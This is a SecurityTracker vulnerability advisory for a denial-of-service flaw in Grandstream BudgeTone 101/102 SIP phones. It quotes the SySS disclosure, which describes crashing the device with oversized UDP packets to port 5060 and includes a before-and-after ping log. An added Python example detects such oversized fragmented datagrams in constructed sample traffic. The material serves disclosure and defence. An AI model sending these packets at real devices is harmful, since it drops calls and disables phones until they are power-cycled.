SecurityTracker.com
Category:  Device (VoIP/Phone/FAX)  >  BudgeTone SIP Phones
Vendors:  Grandstream Networks
Grandstream BudgeTone 101/102 Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1014665
SecurityTracker URL:  http://securitytracker.com/id?1014665
CVE Reference:  CVE-2005-2581
Updated:  Jun 8 2008
Original Entry Date:  Aug 13 2005
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 101/102; Tested on firmware version 1.0.6.7
Description:  A vulnerability was reported in the Grandstream BudgeTone 101/102. A remote user can cause denial of service conditions.

A remote user can send a UDP packet larger than 65534 bytes to port 5060 on the target device to cause the device to crash. As a result, any active calls are dropped, the display stops working, and the built-in web server becomes inaccessible.

A power reset is required to return the device to normal operations.

A remote user can send a UDP packet that is exactly 65534 bytes to potentially cause the target device to reboot.

The vendor was notified on July 21, 2005.

Pierre Kroma of SySS GmbH reported this vulnerability.

Impact:  A remote user can cause the target device to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.grandstream.com/
Cause:  Boundary error, Exception handling error
Reported By:  Kroma Pierre <kroma@syss.de>
Message History:   None.
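
Since no solution was available for the device itself, the condition can be watched for at the network layer. The following is an added example, not part of the SecurityTracker entry or the SySS advisory: it totals IPv4 fragment records per datagram and flags those addressed to UDP port 5060 that reach the 65534-byte size named above. Measuring the full reassembled IP datagram with a 20-byte header is an assumption, as are the record layout, the helper names and the documentation addresses.

```python
from collections import defaultdict

SIP_PORT = 5060
ADVISORY_SIZE = 65534   # size named in the advisory
IPV4_MAX = 65535        # largest valid IPv4 datagram (16-bit total length field)
IP_HEADER = 20          # assumption: IPv4 header without options


def split(src, dst, ip_id, sizes, port=SIP_PORT):
    """Constructed-data helper: lay fragment payloads end to end.
    Record = (src, dst, ip_id, offset, payload_len, udp_dport); the UDP
    port is only visible in the first fragment (offset 0)."""
    out, off = [], 0
    for n in sizes:
        out.append((src, dst, ip_id, off, n, port if off == 0 else None))
        off += n
    return out


def find_oversized_sip(fragments, threshold=ADVISORY_SIZE):
    """Return (src, dst, total_len, reason) for datagrams to UDP/5060
    whose reassembled size is at or above the threshold."""
    end = defaultdict(int)   # (src, dst, ip_id) -> highest byte covered
    dport = {}
    for src, dst, ip_id, off, length, port in fragments:
        key = (src, dst, ip_id)
        end[key] = max(end[key], off + length)
        if off == 0:
            dport[key] = port
    alerts = []
    for key, payload_end in end.items():
        total = IP_HEADER + payload_end
        if dport.get(key) != SIP_PORT or total < threshold:
            continue
        reason = ("exceeds IPv4 maximum" if total > IPV4_MAX
                  else "at or above advisory size")
        alerts.append((key[0], key[1], total, reason))
    return sorted(alerts)


# Constructed sample (documentation addresses), not captured traffic.
SAMPLE = (
    split("192.0.2.10", "198.51.100.5", 1, [540])                  # ordinary SIP request
    + split("192.0.2.66", "198.51.100.5", 7, [1480] * 44 + [394])  # 65534 total
    + split("192.0.2.67", "198.51.100.5", 9, [1480] * 45)          # 66620 total
)

if __name__ == "__main__":
    for alert in find_oversized_sip(SAMPLE):
        print(alert)
```

The same size test can be applied as a drop rule on a gateway in front of the phones; the threshold parameter can be lowered if any datagram of that order of magnitude to the SIP port should be treated as suspect.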


 Source Message Contents

Date:  Fri, 12 Aug 2005 14:27:05 +0200
From:  Kroma Pierre <kroma@syss.de>
Subject:  Grandstream Budge Tone 101/102 DoS Vulnerability

 
-------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
-------------------------------------------------------------------

Problem discovered: 		July 20th 2005
Vendor contacted: 		July 21st 2005
Advisory will be published on: 	August 12th 2005

AUTHOR: 	Pierre Kroma (kroma@syss.de)
		SySS GmbH
		72070 Tuebingen / Germany
		Tel.: +49-7071-407856-0
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE:			Grandstream Budge Tone-101
			Grandstream Budge Tone-102
AFFECTED VERSIONS: 	perhaps all(?) <= 1.0.6.7 (firmware 1.0.6.7 tested)

EXPLOIT:		attached
VENDOR STATUS: 		informed
SEVERITY: 		medium
Remotely exploitable: 	yes

DESCRIPTION:
It is possible to initiate a DoS attack against this VoIP
(hardware) phone. If you send a UDP packet greater than 65534 bytes
to port 5060, the device stops working:

- any active telephone call will be aborted.
- the display will show nothing / display freeze.
- the integrated HTTP-server won't be reachable any more.

To solve the problem, you must switch the phone off and on again.

If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.

############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=250 time=0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=250 time=0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=250 time=0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.404/0.429/0.479/0.042 ms

Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

Copyright 2007, SecurityGlobal.net LLC